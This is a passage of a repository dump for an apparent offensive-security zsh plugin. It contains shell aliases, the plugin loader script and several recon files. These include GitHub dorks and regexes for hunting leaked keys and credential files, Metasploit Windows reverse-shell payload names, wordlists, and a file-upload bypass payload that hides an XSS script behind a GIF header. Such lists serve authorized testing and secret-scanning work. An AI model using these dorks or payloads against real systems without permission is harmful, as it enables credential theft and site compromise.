CERTIFICATE-----\nMIICyDCCAjGgAwIBAgIUAcIAbh51mEfqQLiFtggAAABuHn8wDQYJKoZIhvcNAQEL\nBQAwgYcxCzAJBgNVBAYTAlVTMQswCQYDVQQIEwJXQTEQMA4GA1UEBxMHUmVkbW9u\nZDEeMBwGA1UEChMVTWljcm9zb2Z0IENvcnBvcmF0aW9uMR4wHAYDVQQLExVNaWNy\nb3NvZnQgQ29ycG9yYXRpb24xGTAXBgNVBAMTEGdvLm1pY3Jvc29mdC5jb20wHhcN\nMTkwOTA2MTkzNzIxWhcNMjEwOTA2MTkzNzIxWjCBhzELMAkGA1UEBhMCVVMxCzAJ\nBgNVBAgTAldBMRAwDgYDVQQHEwdSZWRtb25kMR4wHAYDVQQKExVNaWNyb3NvZnQg\nQ29ycG9yYXRpb24xHjAcBgNVBAsTFU1pY3Jvc29mdCBDb3Jwb3JhdGlvbjEZMBcG\nA1UEAxMQZ28ubWljcm9zb2Z0LmNvbTCBnzANBgkqhkiG9w0BAQEFAAOBjQAwgYkC\ngYEAthPoTXbV1FqXAeKic/mn0JmTVAe1eoBVYhHo5lPUl7joqwFS5UNXM9scJMgm\n/schqRAudTuB8W/W1xMlfSbSRYwJW3oRJI/oxUSKhAFxHdVJYhbkWoMeK8L9EqUF\nq987v40uZviXSp8XTSEjBVEdhvW3/MHJzaoW7a+gchco7D0CAwEAAaMvMC0wDAYD\nVR0TAQH/BAIwADAdBgNVHQ4EFgQUg2JaOA9UjImKCHybc5Bqu8YS40cwDQYJKoZI\nhvcNAQELBQADgYEAHkTVXl44F+tN0WWn3rbIUosimlbSYd6S9yLfCPGhpBdCv8GF\n3jfFULoiFv/L79KuNfZ/RElR+xtqnukrg3C9NYCC3mRymZRMnjnoFjDG//AoeLsU\n4802Opg2opg+OG23YFvz01rmdiHtUFM/0S1V4p3oiCDkwdz24E6/60OQu0A=\n-----END CERTIFICATE-----\n"
  },
  {
    "path": "payloads/aliases.rc",
    "content": "\n#nav\nalias cd..=\"cd ../\"\nalias cls=\"clear\"\nalias path=\"echo -e \\${PATH//:/\\\\n}\"\nalias cp=\"cp -iv\"\nalias mv=\"mv -iv\"\nalias lf=\"ls -l | egrep -v '^d'\"\nalias ldir='ls -d */'\n\n#sys\nalias mounted=\"sudo mount | column -t\"\nalias df=\"df -mTh --total\"\nalias free=\"free -th\"\nalias ps=\"ps auxf\"\nalias psg=\"ps aux | grep -v grep | grep -i -e VSZ -e \"\n\n#network\nalias pcap=\"sudo tcpdump -r\"\nalias myip=\"curl icanhazip.com\"\nalias grip=\"grep -o '[0-9]\\{1,3\\}\\.[0-9]\\{1,3\\}\\.[0-9]\\{1,3\\}\\.[0-9]\\{1,3\\}'\"\n\n#proton vpn\nalias pv-check=\"sudo pip3 install protonvpn-cli --upgrade\"\nalias pvt=\"sudo protonvpn c -f\"\nalias pvu=\"sudo protonvpn c -f -p udp\"\nalias pvd=\"sudo protonvpn disconnect\"\nalias pvs=\"sudo protonvpn status\"\n\n#zsh\nalias zprc=\"cat ~/.zshrc\"\nalias zerc=\"nano ~/.zshrc\"\nalias zsrc=\"source ~/.zshrc\"\n\n# files and directory\nalias linestocsv=\"paste -s -d, -\"\nalias csvtolines=\"tr ',' '\\n'\"\nalias sfu=\"sort -u \"\nalias sfip=\"sort -u | sort -V \"\nalias sfuc=\"sort | uniq -c | sort -n\"\nalias dos2unix=\"tr -d '\\015' \"\nalias unix2dos=\"sed -e 's/$/\\r/'\"\n\n# out\n\nalias trim1=\"sed 's/.$//'\"\nalias trim2=\"sed 's/..$//'\"\nalias trim3=\"sed 's/...$//'\"\nalias trim4=\"sed 's/....$//'\"\n\n# tools\nalias hp=\"httprobe -t 3000 -c 50 \"\n"
  },
  {
    "path": "payloads/github-dorks-commits.txt",
    "content": "    \"Slack Token\": \"(xox[p|b|o|a]-[0-9]{12}-[0-9]{12}-[0-9]{12}-[a-z0-9]{32})\",\n    \"RSA private key\": \"-----BEGIN RSA PRIVATE KEY-----\",\n    \"SSH (OPENSSH) private key\": \"-----BEGIN OPENSSH PRIVATE KEY-----\",\n    \"SSH (DSA) private key\": \"-----BEGIN DSA PRIVATE KEY-----\",\n    \"SSH (EC) private key\": \"-----BEGIN EC PRIVATE KEY-----\",\n    \"PGP private key block\": \"-----BEGIN PGP PRIVATE KEY BLOCK-----\",\n    \"Facebook Oauth\": \"[f|F][a|A][c|C][e|E][b|B][o|O][o|O][k|K].{0,30}['\\\"\\\\s][0-9a-f]{32}['\\\"\\\\s]\",\n    \"Twitter Oauth\": \"[t|T][w|W][i|I][t|T][t|T][e|E][r|R].{0,30}['\\\"\\\\s][0-9a-zA-Z]{35,44}['\\\"\\\\s]\",\n    \"GitHub\": \"[g|G][i|I][t|T][h|H][u|U][b|B].{0,30}['\\\"\\\\s][0-9a-zA-Z]{35,40}['\\\"\\\\s]\",\n    \"Google Oauth\": \"(\\\"client_secret\\\":\\\"[a-zA-Z0-9-_]{24}\\\")\",\n    \"AWS API Key\": \"AKIA[0-9A-Z]{16}\",\n    \"Heroku API Key\": \"[h|H][e|E][r|R][o|O][k|K][u|U].{0,30}[0-9A-F]{8}-[0-9A-F]{4}-[0-9A-F]{4}-[0-9A-F]{4}-[0-9A-F]{12}\",\n    \"Generic Secret\": \"[s|S][e|E][c|C][r|R][e|E][t|T].{0,30}['\\\"\\\\s][0-9a-zA-Z]{32,45}['\\\"\\\\s]\",\n    \"Generic API Key\": \"[a|A][p|P][i|I][_]?[k|K][e|E][y|Y].{0,30}['\\\"\\\\s][0-9a-zA-Z]{32,45}['\\\"\\\\s]\",\n    \"Slack Webhook\": \"https://hooks.slack.com/services/T[a-zA-Z0-9_]{8}/B[a-zA-Z0-9_]{8}/[a-zA-Z0-9_]{24}\",\n    \"Google (GCP) Service-account\": \"\\\"type\\\": \\\"service_account\\\"\",\n    \"Twilio API Key\": \"SK[a-z0-9]{32}\",\n    \"Password in URL\": \"[a-zA-Z]{3,10}://[^/\\\\s:@]{3,20}:[^/\\\\s:@]{3,20}@.{1,100}[\\\"'\\\\s]\",\n\n\n    “Internal subdomain”: re.compile(‘([a-z0-9]+[.]*supersecretinternal[.]com)’),\n   “Slack Token”: re.compile(‘(xox[p|b|o|a]-[0-9]{12}-[0-9]{12}-[0-9]{12}-[a-z0-9]{32})’),\n   “RSA private key”: re.compile(‘—–BEGIN RSA PRIVATE KEY—–‘),\n   “Facebook Oauth”: re.compile(‘[f|F][a|A][c|C][e|E][b|B][o|O][o|O][k|K].*[\\’|”][0-9a-f]{32}[\\’|”]’),\n   “Twitter Oauth”: 
re.compile(‘[t|T][w|W][i|I][t|T][t|T][e|E][r|R].*[\\’|”][0-9a-zA-Z]{35,44}[\\’|”]’),\n   “Google Oauth”: re.compile(‘(“client_secret”:”[a-zA-Z0-9-_]{24}”)’),\n   “AWS API Key”: re.compile(‘AKIA[0-9A-Z]{16}’),#[a|A][w|W][s|S].*AKIA[0-9A-Z]{16}’),\n   “Heroku API Key”: re.compile(‘[h|H][e|E][r|R][o|O][k|K][u|U].*[0-9A-F]{8}-[0-9A-F]{4}-[0-9A-F]{4}-[0-9A-F]{4}-[0-9A-F]{12}’),\n   “Generic Secret”: re.compile(‘[s|S][e|E][c|C][r|R][e|E][t|T].*[\\’|”][0-9a-zA-Z]{32,45}[\\’|”]’)"
  },
  {
    "path": "payloads/msf-windows-payloads.txt",
    "content": "windows/x64/meterpreter/reverse_http\nwindows/x64/meterpreter/reverse_https\nwindows/x64/meterpreter/reverse_named_pipe\nwindows/x64/meterpreter/reverse_tcp\nwindows/x64/meterpreter/reverse_winhttp\nwindows/x64/meterpreter/reverse_winhttps\nwindows/x64/shell/reverse_tcp\nwindows/x64/shell/reverse_tcp_rc4\nwindows/x64/shell/reverse_tcp_uuid\nwindows/x64/shell_bind_tcp\nwindows/x64/shell_reverse_tcp"
  },
  {
    "path": "payloads/recon-dorks-github.txt",
    "content": "filename:constants\nfilename:settings\nfilename:database\nfilename:config\nfilename:environment\nfilename:spec\nfilename:zhrc\nfilename:bash\nfilename:npmrc\nfilename:dockercfg\nfilename:pass\nfilename:global\nfilename:credentials\nfilename:connections\nfilename:s3cfg\nfilename:wp-config\nfilename:htpasswd\nfilename:git-credentials\nfilename:id_dsa\nfilename:id_rsa\nextension:env\nextension:cfg\nextension:ini\nlanguage:yaml -filename:travis\nextension:properties\nextension:bat\nextension:sh\nextension:zsh\nextension:pem\nextension:ppk\nextension:sql\nfilename:bash_history\nfilename:bash_profile\nfilename:bashrc\nfilename:cshrc\nfilename:history\nfilename:netrc\nfilename:pgpass\nfilename:tugboat\nfilename:dhcpd.conf\nfilename:express.conf\nfilename:filezilla.xml\nfilename:idea14.key\nfilename:makefile\nfilename:gitconfig\nfilename:prod.exs\nfilename:prod.secret.exs\nfilename:proftpdpasswd\nfilename:recentservers.xml\nfilename:robomongo.json\nfilename:server.cfg\nfilename:shadow\nfilename:sshd_config\nfilename:known_hosts\nfilename:dockercfg\nfilename:github_token\nstaging\nstg\nprod\npreprod\nswagger\ninternal\ndotfiles\ndot-files\nmydotfiles\nconfig\ndbpasswd\ndb_password\ndb_username\ndbuser\ntestuser\ndbpassword\nkeyPassword\nstorePassword\npasswords\npassword\nsecret.password\ndatabase_password\nsql_password\npasswd\npass\npwd\npwds\nroot_password\ncredentials\nsecurity_credentials\nconnectionstring\nprivate 
-language:java\nprivate_key\nmaster_key\ntoken\naccess_token\nauth_token\noauth_token\nauthorizationToken\nsecret\nsecrets\nsecret_key\nsecret_token\napi_secret\napp_secret\nappsecret\nclient_secret\nkey\nsend_keys\nsend.keys\nsendkeys\napikey\napi_key\napp_key\napplication_key\nappkey\nappkeysecret\naccess_key\napiSecret\nx-api-key\napidocs\nsecret_access_key\nencryption_key\nconsumer_key\nauth\nsecure\nlogin\nconn.login\nsshpass\nssh2_auth_password\nirc_pass\nfb_secret\nsf_username\nnode_env\naws_key\naws_token\naws_secret\naws_access\nAWSSecretKey\ngithub_key\ngithub_token\ngh_token\nslack_api\nslack_token\nbucket_password\nredis_password\nldap_username\nldap_password\ngmail_username\ngmail_password\ncodecov_token\nfabricApiSecret\nmailgun\nmailchimp\nappspot\nfirebase\ngitlab\nstripe\nherokuapp\ncloudfront\namazonaws\nremoved\n\"removed password\"\nhardcoded\noops\n\"fixed security\"\n\"removed prod\"\n\"removed creds\"\n\"removed secret\"\nfilename:passwords.txt\nfilename:users.txt\n\n"
  },
  {
    "path": "payloads/recon-dorks-google.txt",
    "content": ""
  },
  {
    "path": "payloads/resolvers.txt",
    "content": "1.1.1.1\n1.0.0.1\n8.8.8.8\n8.8.4.4\n208.67.222.222\n208.67.220.220\n64.6.64.6\n64.6.65.6\n84.200.69.80\n84.200.70.40\n205.171.3.66\n205.171.202.166\n205.171.3.26\n205.171.2.26\n216.146.35.35\n216.146.36.36\n45.33.97.5\n37.235.1.177\n37.235.1.174\n172.104.237.57\n77.88.8.8\n77.88.8.1\n91.239.100.100\n89.233.43.71\n74.82.42.42\n156.154.70.5\n156.154.71.5\n45.77.165.194\n68.238.120.12 \n68.238.0.12\n207.148.83.241\n142.4.204.111\n142.4.205.47\n149.56.184.112\n51.79.68.177\n66.70.228.164\n172.98.193.42\n66.70.228.164\n128.31.0.72 \n155.138.240.237\n"
  },
  {
    "path": "payloads/secrets-content.json",
    "content": "{\n    \"flags\": \"-HnriE\",\n    \"patterns\": [\n        \"[a-z0-9.-]+\\\\.s3\\\\.amazonaws\\\\.com\",\n        \"[a-z0-9.-]+\\\\.s3-[a-z0-9-]\\\\.amazonaws\\\\.com\",\n        \"[a-z0-9.-]+\\\\.s3-website[.-](eu|ap|us|ca|sa|cn)\",\n        \"//s3\\\\.amazonaws\\\\.com/[a-z0-9._-]+\",\n        \"//s3-[a-z0-9-]+\\\\.amazonaws\\\\.com/[a-z0-9._-]+\",\n        \"([^A-Z0-9]|^)(AKIA|A3T|AGPA|AIDA|AROA|AIPA|ANPA|ANVA|ASIA)[A-Z0-9]{12,}\",\n        \"([^A-Za-z0-9+/]|^)(eyJ|YTo|Tzo|PD[89]|aHR0cHM6L|aHR0cDo|rO0)[%a-zA-Z0-9+/]+={0,2}\",\n        \"([^A-Z0-9]|)AKIA[A-Z0-9]{12}([^A-Z0-9]|)\",\n        \"[\\\\s][a-zA-Z0-9]{40}[\\\\s]\",\n        \"aws_secret_access_key.*?[a-zA-Z0-9/\\\\\\\\+]{40}\",\n        \"amzn\\\\\\\\.mws\\\\\\\\.[0-9a-f]{8}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{12}\",\n        \"EAACEdEose0cBA[0-9A-Za-z]+\",\n        \"[f|F][a|A][c|C][e|E][b|B][o|O][o|O][k|K].*['|\\\\\\\"][0-9a-f]{32}['|\\\\\\\"]\",\n        \"[a|A][p|P][i|I][_]?[k|K][e|E][y|Y].*['|\\\\\\\"][0-9a-zA-Z]{32,45}['|\\\\\\\"]\",\n        \"[s|S][e|E][c|C][r|R][e|E][t|T].*['|\\\\\\\"][0-9a-zA-Z]{32,45}['|\\\\\\\"]\",\n        \"[\\\\s*](token:\\\\s*)[\\\\S]{20}\",\n        \"gitlab.token[^a-z0-9_]*?[a-z0-9_]{20}([^a-z0-9_]|$)\",\n        \"private.token[^a-z0-9_]*?[a-z0-9_]{20}([^a-z0-9_]|$)\",\n        \"access.token[^a-z0-9_]*?[a-z0-9_]{20}([^a-z0-9_]|$)\",\n        \"[g|G][i|I][t|T][h|H][u|U][b|B].*['|\\\\\\\"][0-9a-zA-Z]{35,40}['|\\\\\\\"]\",\n        \"\\\"type\\\": \\\"service_account\\\"\",\n        \"[0-9]+-[0-9A-Za-z_]{32}\\\\.apps\\\\.googleusercontent\\\\.com\",\n        \"ya29\\\\.[0-9A-Za-z\\\\-_]+\",\n        \"AIza[0-9A-Za-z\\\\\\\\-_]{35}\",\n        \"[h|H][e|E][r|R][o|O][k|K][u|U].*[0-9A-F]{8}-[0-9A-F]{4}-[0-9A-F]{4}-[0-9A-F]{4}-[0-9A-F]{12}\",\n        \"[0-9a-f]{32}-us[0-9]{1,2}\",\n        \"key-[0-9a-zA-Z]{32}\",\n        \"[a-zA-Z]{3,10}://[^/\\\\s:@]{3,20}:[^/\\\\s:@]{3,20}@.{1,100}[\\\"'\\\\s]\",\n        
\"access_token\\\\$production\\\\$[0-9a-z]{16}\\\\$[0-9a-f]{32}\",\n        \"sk_live_[0-9a-z]{32}\",\n        \"(-*)BEGIN [\\\\\\\\s\\\\\\\\S]{2,} PRIVATE KEY(-*)\",\n        \"SG\\\\.[a-zA-Z0-9]{22}\\\\.[a-zA-Z0-9]{43}\",\n        \"(xox[p|b|o|a]-[0-9]{12}-[0-9]{12}-[0-9]{12}-[a-z0-9]{32})\",\n        \"(xox[p|b|o|a]-[0-9]{12}-[0-9]{12}-[0-9]{12}-[a-z0-9]{32})\",\n        \"https://hooks.slack.com/services/T[a-zA-Z0-9_]{8}/B[a-zA-Z0-9_]{8}/[a-zA-Z0-9_]{24}\",\n        \"sq0atp-[0-9A-Za-z\\\\\\\\-_]{22}\",\n        \"sq0csp-[0-9A-Za-z\\\\\\\\-_]{43}\",\n        \"sk_live_[0-9a-zA-Z]{24}\",\n        \"rk_live_[0-9a-zA-Z]{24}\",\n        \"SK[0-9a-fA-F]{32}\",\n        \"[t|T][w|W][i|I][t|T][t|T][e|E][r|R].*[1-9][0-9]+-[0-9a-zA-Z]{40}\",\n        \"[t|T][w|W][i|I][t|T][t|T][e|E][r|R].*['|\\\"][0-9a-zA-Z]{35,44}['|\\\"]\",\n        \"deleted\",\n        \"security\",\n        \"removed\",\n        \"test-data\",\n        \"prod\",\n        \"production\"\n\n    ]\n}\n"
  },
  {
    "path": "payloads/secrets-files.json",
    "content": "{\n    \"flags\": \"-HnriE\",\n    \"patterns\": [\n        \"database\",\n        \"settings\",\n        \"database\",\n        \"config\",\n        \"environment\",\n        \"spec\",\n        \"zshrc\",\n        \"bash\",\n        \"npmrc\",\n        \"dockercfg\",\n        \"pass\",\n        \"global\",\n        \"credentials\",\n        \"connections\",\n        \"s3cfg\",\n        \"wp-config\",\n        \"htpasswd\",\n        \"git-credentials\",\n        \"id_dsa\",\n        \"id_rsa\",\n        \"creds\",\n        \".*\\\\.env$\",\n        \"\\\\.agilekeychain$\",\n        \"\\\\.?aws/credentials$\",\n        \"^\\\\.?htpasswd$\",\n        \"\\\\.keychain$\",\n        \"\\\\.cscfg$\",\n        \"carrierwave.rb\",\n        \"knife.rb\",\n        \"\\\\.?chef/(.*)\\\\.pem$\",\n        \"^(\\\\.|_)?netrc$\",\n        \"credential\",\n        \"password\",\n        \"^\\\\.?dbeaver-data-sources.xml$\",\n        \"\\\\.dayone$\",\n        \"doctl/config.yaml$\",\n        \"settings.py\",\n        \"^\\\\.?dockercfg$\",\n        \"^\\\\.?env$\",\n        \"filezilla.xml\",\n        \"recentservers.xml\",\n        \"^key(store|ring)$\",\n        \"^\\\\.?gitconfig$\",\n        \"config/hub$\",\n        \"\\\\.gnucash$\",\n        \"credentials.db\",\n        \"credentials.json\",\n        \"^.*-[a-f0-9]{12}\\\\.json$\",\n        \"\\\\.?xchat2?/servlist_?\\\\.conf$\",\n        \"\\\\.?irssi/config$\",\n        \"\\\\.jks$\",\n        \"jenkins.plugins.publish_over_ssh.BapSshPublisherPlugin.xml\",\n        \"\\\\.kwallet$\",\n        \"^kdbx?$\",\n        \".boto\",\n        \"adc.json\",\n        \"configuration.user.xpl\",\n        \"\\\\.tpm$\",\n        \"\\\\.bek$\",\n        \"\\\\.mdf$\",\n        \"\\\\.sdf$\",\n        \"^\\\\.?muttrc$\",\n        \"^\\\\.?mysql_history$\",\n        \"^\\\\.?npmrc$\",\n        \"\\\\.pcap$\",\n        \"omniauth.rb\",\n        \"\\\\.ovpn$\",\n        \"config(\\\\.inc)?\\\\.php$\",\n        
\"\\\\.psafe3$\",\n        \"otr.private_key\",\n        \"\\\\.?purple/accounts\\\\.xml$\",\n        \"^\\\\.?psql_history$\",\n        \"^\\\\.?pgpass$\",\n        \"credentials.xml\",\n        \"etc/passwd$\",\n        \"etc/shadow$\",\n        \"LocalSettings.php\",\n        \"database.yml\",\n        \"\\\\.pkcs12$\",\n        \"\\\\.p12$\",\n        \"\\\\.pfx$\",\n        \"\\\\.asc$\",\n        \"^key(pair)?$\",\n        \"\\\\.pem$\",\n        \"journal.txt\",\n        \"^.*_rsa$\",\n        \"^.*_dsa$\",\n        \"^.*_ed25519$\",\n        \"^.*_ecdsa$\",\n        \"\\\\.?recon-ng/keys\\\\.db$\",\n        \"\\\\.rdp$\",\n        \"robomongo.json\",\n        \"^\\\\.?irb_history$\",\n        \"secret_token.rb\",\n        \"\\\\.?gem/credentials$\",\n        \"^\\\\.?s3cfg$\",\n        \"^sftp-config(\\\\.json)?$\",\n        \"^sql(dump)?$\",\n        \"\\\\.sqlite$\",\n        \"\\\\.?ssh/config$\",\n        \"Favorites.plist\",\n        \"`^\\\\.?(bash_|zsh_)?aliases$\",\n        \"^\\\\.?(bash_|zsh_|sh_|z)?history$\",\n        \"^\\\\.?(bash|zsh|csh)rc$\",\n        \".exports\",\n        \".functions\",\n        \".extra\",\n        \"^\\\\.?(bash_|zsh_)?profile$\",\n        \"^\\\\.?trc$\",\n        \"terraform.tfvars\",\n        \"^\\\\.?tugboat$\",\n        \"\\\\.tblk$\",\n        \"ventrilo_srv.ini\",\n        \"^\\\\.?gitrobrc$\",\n        \"\\\\.fve$\",\n        \"proftpdpasswd\",\n        \"^\\\\.?git-credentials$\",\n        \"robomongo.json\",\n        \"idea14.key\",\n        \"express.conf\",\n        \"prod.exs\",\n        \"prod.secret.exs\",\n        \"logins.json\",\n        \".remote-sync.json\",\n        \".ftpconfig\"\n    ]\n}\n"
  },
  {
    "path": "payloads/tcp-ports.txt",
    "content": "21,22,25,80,88,161,443,445,744,1433,1521,2075,2076,3000,3306,3366,3389,3868,4000,4040,4044,4443,5000,5432,5900,6000,6443,7077,8000,8080,8081,8089,8181,8443,8888,9000,9091,9443,9999,27017,10000,15672"
  },
  {
    "path": "payloads/user-agents.txt",
    "content": "Googlebot/2.1 (+http://www.google.com/bot.html)\nMozilla/5.0\nMozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36\nMozilla/5.0 (iPhone; CPU iPhone OS 12_2 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Mobile/15E148\n"
  },
  {
    "path": "payloads/web-file-upload-bypass-bytes.txt",
    "content": "JPEG  - FF D8 FF DB - ÿØÿÛ \nGIF   - 47 49 46 38 - GIF8\nPNG   - 89 50 4E 47 - ‰PNG\n"
  },
  {
    "path": "payloads/web-file-upload-bypass.txt",
    "content": "Content-Disposition: form-data; name=\"upload\"; filename=\"badfile.''gif\"\nContent-Type: image/png\n\nGIF8\n<html><script>alert('XSS');</script></html>"
  },
  {
    "path": "payloads/wordlist-api.txt",
    "content": "0\n1\n2\n3\naccelerate\naccept\naccount\naccounts\nacquire\nactivate\nactive\nadapt\nadd\naddress-check\nadjust\nadmin\nalert\namount\nannotate\nanticipate\napi\napi_auth\napis\napply\narchive\narrange\nasset\nassets\nauth\nauth_user\nbalance\nbalances\nbar\nbaz\nbio\nbios\nbuild\ncalculate\ncfg\nchange\nchannel\nchart\ncheck\nchild\nchildren\nclaim\nclass\nclient\nclients\nclose\ncollect\ncomm\ncomment\ncomments\ncommon\ncommunicate\ncompany\ncompare\ncomplete\ncompose\ncompute\nconf\nconfig\nconnections\nconsolidate\nconstruct\ncontact\ncontract\ncoordinate\ncount\ncreate\ncredentials\ncreds\ncrush\ncsv\ncurrent\ncustom\ncustomer\ncustomers\ndamage\ndashboard\ndata\ndebug\ndef\ndefault\ndefine\ndel\ndelete\ndeliver\ndelta\ndemo\ndemonstrate\ndequeue\nderive\ndesign\ndestroy\ndetails\ndetect\ndev\ndevelop\ndevelopers\ndeviceCatalog\ndevices\ndeviceTypes\ndevise\ndir\ndirectory\ndisable\ndisplay\ndivide\ndo\ndob\ndocs\ndocumentation\ndoFor\ndomain\ndownload\nedit\nemail\nemployee\nenable\nerr\nerrors\nevent\nevents\nexplode\nexport\nfabricate\nfashion\nfeed\nfile\nfiles\nfilter\nfoo\nforge\nform\nformat\ngenerate\nget\ngithub\ngmail\ngo\ngroup\nhealth\nhelp\nhidden\nhistory\nhome\nid\nimage\nimport\nimprove\ninclude\ninfo\ninform\ninput\ninquiry\ninsert\ninstall\ninstances\ninterpret\nitem\njob\njoin\njson\nkey\nkill\nlang\nlast\nlevel\nlink\nlinks\nlist\nload\nlocation\nlock\nlog\nlog_event\nlogin\nlogins\nlogout\nlogs\nloop\nmain\nmake\nmanufacturers\nmap\nmax\nmember\nmembers\nmerchant\nmerge\nmetadata\nmethod\nmethods\nmetrics\nmin\nmod\nmoney\nmonitoring\nmove\nmultiply\nmy\nname\nnames\nnew\nnext\nnotifications\nnotify\noauth\nobject\nobjects\nopen\noption\noptions\norder\norders\noriginate\nout\npack\npage\npages\npanel\nparent\nparse\npass\npassword\npasswords\npermissions\nphone\npicture\npin\nplugin\npost\nposts\npreferences\npreserve\npreview\nprint\nprivate\nprod\nproduce\nproduction\nprofile\nprofiles\npromote\npublic\nput\nq\nquery\nque
ue\nqueue-jobs\nquit\nraw\nreactivate\nread\nrecite\nrecord\nref\nreg\nregister\nrelease\nremove\nresend-verification\nrestore\nrestrict\nretrieve\nrobots.txt\nrss\nrun\ns\nsale\nsales\nsave\nsearch\nselect\nsend\nserver\nset\nsetting\nsettings\nsetup\nshow\nsite\nsleep\nsort\nsplit\nstart\nstate\nstatus\nstop\nstudy\nsub\nsummaries\nswagger\nswagger.json\nswagger-resources\nswagger-ui.html\ntable\ntags\ntemp\ntemplate\nterminate\ntest\ntests\ntheme\nticket\ntmp\ntoken\ntwitter\ntype\nunderstand\nundo\nunion\nunit\nunqueue\nupdate\nupgrade\nupload\nupset\nurl\nuse\nuser\nuserAccountAssignments\nuserAssets\nuserdetails\nusername\nuserPreferences\nusers\nv0\nv1\nv2\nv3\nvalidate\nvendor\nvendors\nverify\nversion\nwait\nwebsite\nwork\nxml\nxmlrpc\nyahoo\nzip\n"
  },
  {
    "path": "payloads/wordlists.txt",
    "content": "/usr/share/seclists/Discovery/Web-Content/quickhits.txt\n/usr/share/seclists/Discovery/Web-Content/common.txt\n/usr/share/seclists/Discovery/Web-Content/raft-large-words.txt\n/usr/share/seclists/Discovery/Web-Content/raft-large-files.txt\n/usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt\n/usr/share/seclists/Discovery/DNS/dns-Jhaddix.txt\n/usr/share/seclists/Discovery/Web-Content/swagger.txt\n/usr/share/seclists/Discovery/Web-Content/graphql.txt\n"
  },
  {
    "path": "quiver.code-workspace",
    "content": "{\n    \"folders\": [\n        {\n            \"path\": \".\"\n        }\n    ]\n}"
  },
  {
    "path": "quiver.plugin.zsh",
    "content": "#!/usr/bin/env zsh\n\nautoload colors; colors\n\n############################################################# \n# quiver\n# Author: Steve Mcilwain\n# Contributors: \n#############################################################\n\n# check for essential packages\n\ndpkg -l | grep -qw rlwrap || sudo apt-get -y install rlwrap\ndpkg -l | grep -qw git || sudo apt-get -y install git\n\n# check for directories\n\nmkdir -p $HOME/.quiver/{vars,globals}\n\n############################################################# \n# Constants\n#############################################################\n\nexport __PLUGIN=\"${0:A:h}\"\nexport __VER=$(cat ${__PLUGIN}/VERSION)\nexport __LOGFILE=\"${__PLUGIN}/log.txt\"\nexport __REMOTE_CHK=\"${__PLUGIN}/remote_checked.txt\"\nexport __REMOTE_VER=\"${__PLUGIN}/remote_ver.txt\"\nexport __STATUS=$(cd ${__PLUGIN} && git status | grep On | cut -d\" \" -f2,3)\nexport __VARS=$HOME/.quiver/vars\nexport __GLOBALS=$HOME/.quiver/globals\nexport __PAYLOADS=\"$__PLUGIN/payloads\"\nexport __SCRIPTS=\"$__PLUGIN/scripts\"\nexport __TOOLS=\"$HOME/tools\"\n\n############################################################# \n# Self Update\n#############################################################\n\n__version-check() {\n\n  local seconds=$((60*60*24*1))\n\n  if test -f \"$__REMOTE_CHK\" ; then\n      if test \"$(($(date \"+%s\")-$(date -f \"$__REMOTE_CHK\" \"+%s\")))\" -lt \"$seconds\" ; then\n            echo \"[*] Version already checked today: $__REMOTE_CHK\" >> ${__LOGFILE}\n          exit 1\n      fi\n  fi\n\n  date -R > $__REMOTE_CHK\n\n  echo \"$(curl -s https://raw.githubusercontent.com/stevemcilwain/quiver/master/VERSION)\" > $__REMOTE_VER\n  \n  echo \"[*] Version checked and stored in:  $__REMOTE_VER\" >> ${__LOGFILE}\n\n}\n\n(__version-check &)\n\n############################################################# \n# Diagnostic Log\n#############################################################\n\necho \"Quiver ${__VER} in 
${__PLUGIN}\" > ${__LOGFILE}\necho \" \" >> ${__LOGFILE}\necho \"[*] loading... \" >> ${__LOGFILE}\n\n#Source all qq scripts\n\nfor f in ${0:A:h}/modules/qq* ; do\n  echo \"[+] sourcing $f ... \"  >> ${__LOGFILE}\n  source $f >> ${__LOGFILE} 2>&1\ndone\n\nsource ${__ALIASES}\n\n# completion enhancement\n# zstyle ':completion:*' matcher-list 'r:|[-]=**'\nZSTYLE_ORIG=`zstyle -L ':completion:\\*' matcher-list`\nZSTYLE_NEW=\"${ZSTYLE_ORIG} 'r:|[-]=**'\"\neval ${ZSTYLE_NEW}\n\necho \"[*] quiver loaded.\" >> ${__LOGFILE}\n\n############################################################# \n# Shell Log\n#############################################################\n\necho \" \"\n\nif [[ -f \"$__REMOTE_VER\" ]]; then\n  \n  echo \"[*] Remote version file exists: $__REMOTE_VER \" >> ${__LOGFILE}\n\n  rv=$(cat ${__REMOTE_VER})\n\n  if [[ ! -z $rv ]]; then\n\n    echo \"[*] Remote version is |${rv}|\" >> ${__LOGFILE}\n\n    [[ \"$rv\" == \"$__VER\" ]] && __info \"Quiver is up to date\" || __warn \"Quiver update available: $rv, use qq-update to install\"\n\n  fi\n\nfi\n\n__info \"Quiver ${__VER} ZSH plugin loaded \"\n\n"
  },
  {
    "path": "scripts/dns-reverse-brute.zsh",
    "content": "#!/usr/bin/env zsh\n\n############################################################# \n# dns-reverse-brute\n#############################################################\n\n#[[ -z $1 ]] && echo -e \"[!] Missing argument.\\nUsage: zsh $0 <file>\" && exit\n\ncat $1 | while read domain; do if host -t A \"$domain\" | awk '{print $NF}' | grep -E '^(192\\.168\\.|172\\.1[6789]\\.|172\\.2[0-9]\\.|172\\.3[01]\\.|10\\.)' &>/dev/null; then echo $domain; fi; done\n"
  },
  {
    "path": "scripts/image-gen.js",
    "content": "(function() {\n    function encode(a) {\n        if (a.length) {\n            var c = a.length,\n                e = Math.ceil(Math.sqrt(c / 3)),\n                f = e,\n                g = document.createElement(\"canvas\"),\n                h = g.getContext(\"2d\");\n            g.width = e, g.height = f;\n            var j = h.getImageData(0, 0, e, f),\n                k = j.data,\n                l = 0;\n            for (var m = 0; m < f; m++)\n                for (var n = 0; n < e; n++) {\n                    var o = 4 * (m * e) + 4 * n,\n                        p = a[l++],\n                        q = a[l++],\n                        r = a[l++];\n                    (p || q || r) && (p && (k[o] = ord(p)), q && (k[o + 1] = ord(q)), r && (k[o + 2] = ord(r)), k[o + 3] = 255)\n                }\n            return h.putImageData(j, 0, 0), h.canvas.toDataURL()\n        }\n    }\n    var ord = function ord(a) {\n        var c = a + \"\",\n            e = c.charCodeAt(0);\n        if (55296 <= e && 56319 >= e) {\n            if (1 === c.length) return e;\n            var f = c.charCodeAt(1);\n            return 1024 * (e - 55296) + (f - 56320) + 65536\n        }\n        return 56320 <= e && 57343 >= e ? 
